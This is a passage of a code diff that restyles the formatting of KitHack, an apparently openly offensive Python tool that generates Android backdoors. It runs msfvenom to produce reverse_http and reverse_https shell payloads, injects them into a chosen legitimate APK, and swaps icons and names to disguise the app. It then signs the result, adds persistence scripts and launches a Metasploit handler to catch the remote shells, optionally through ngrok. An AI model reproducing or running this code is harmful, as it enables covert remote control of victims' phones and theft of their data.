{2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif a == '02': + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) print( - '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} Use the old Metasploit method'.format( - WHITE, YELLOW)) - print('{0}[02]{1} Use the new KitHack method'.format( - WHITE, YELLOW)) + "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) + ) + print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) - if m == '01': + if m == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk".format( + APK, LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif m == '02': + elif m == "02": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk".format( + LPORT, LHOST + ) + ) location = os.getcwd() print( - "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + "{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( + APK, location + ) + ) print( - "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + os.system("apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("{}\n[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif pay == '06': - print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + elif pay == "06": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) a = a.zfill(2) - if a == '01': + if a == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while ( + input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): break else: Tk().withdraw() icon = filedialog.askopenfilename( - title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", "*.*")), + ) print("\n{0}ICON: {1}".format(YELLOW, icon)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) file = open("/tmp/data.txt", "w") - file.write(icon + '\n') + file.write(icon + "\n") file.write(mainout) file.close() print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print( - "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk".format( + LHOST, LPORT + ) + ) + print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/payload -o output/kithack.apk') + os.system("apktool b output/payload -o output/kithack.apk") location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( + LHOST, LPORT + ) + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"' + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif a == '02': + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) print( - '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} Use the old Metasploit method'.format( - WHITE, YELLOW)) - print('{0}[02]{1} Use the new KitHack method'.format( - WHITE, YELLOW)) + "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) + ) + print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) - if m == '01': + if m == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk".format( + APK, LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format( 